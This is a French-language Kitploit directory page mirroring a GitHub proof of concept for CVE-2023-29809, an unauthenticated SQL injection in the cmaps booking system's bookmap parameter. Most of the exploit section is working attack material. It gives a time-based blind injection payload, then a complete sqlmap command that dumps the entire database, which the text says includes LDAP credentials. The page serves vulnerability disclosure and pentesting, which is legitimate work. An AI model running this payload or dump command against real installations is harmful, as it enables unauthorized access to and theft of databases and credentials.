Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-29809 — Preuve de concept d'exploit pour CVE-2023-29809 : injection SQL non authentifiée dans le système de réservation cmaps. Démontre une injection aveugle basée sur le temps et fournit la commande sqlmap pour l'extraction de la base de données. | Kitploit
Outils/GitHubGitHub/zprototype/cve-2023-29809
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubzprototype/cve-2023-29809

CVE-2023-29809

Preuve de concept d'exploit pour CVE-2023-29809 : injection SQL non authentifiée dans le système de réservation cmaps. Démontre une injection aveugle basée sur le temps et fournit la commande sqlmap pour l'extraction de la base de données.

Voir le dépôt
11il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Titre de l'exploit : Injection SQL non authentifiée

  • Google Dork :
  • Date: 27.04.2023
  • Auteur de l'exploit : Lucas Noki (0xPrototype)
  • Site web du fournisseur : https://github.com/vogtmh
  • Lien du logiciel : https://github.com/vogtmh/cmaps
  • Version : 8.0
  • Testé sur : Mac, Windows, Linux
  • CVE : CVE-2023-29809

Description :

La vulnérabilité trouvée est une injection SQL. Le paramètre bookmap est vulnérable. En visitant la page : http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test, nous obtenons la réponse JSON normale. Cependant, si un guillemet simple est ajouté à la valeur du paramètre bookmap, nous obtenons un message d'erreur :

root@kitploit:~
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />

Maintenant, si deux guillemets simples sont ajoutés, nous obtenons la réponse normale sans erreur. Cela confirme la possibilité d'une injection SQL. Pour vraiment prouver l'injection SQL, nous ajoutons la charge utile suivante :

root@kitploit:~
'-(select*from(select+sleep(2)+from+dual)a)--+

La page attendra deux secondes. Cela confirme l'injection SQL.

Étapes pour reproduire :

  1. Envoyez la charge utile suivante pour tester la vulnérabilité : '-(select*from(select+sleep(2)+from+dual)a)--+

  2. Si le site a attendu deux secondes, exécutez la commande sqlmap suivante pour extraire toute la base de données, y compris les informations d'identification LDAP.

    root@kitploit:~
    python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
    

Un grand merci à iCaotix qui m'a grandement aidé à mettre en place l'environnement ainsi qu'à déboguer ma charge utile.

Requête au serveur :

Screenshot 2023-04-30 at 22.23.51

Réponse du serveur :

Regardez le temps de réponse.

Screenshot 2023-04-30 at 22.24.35
Télécharger l’outil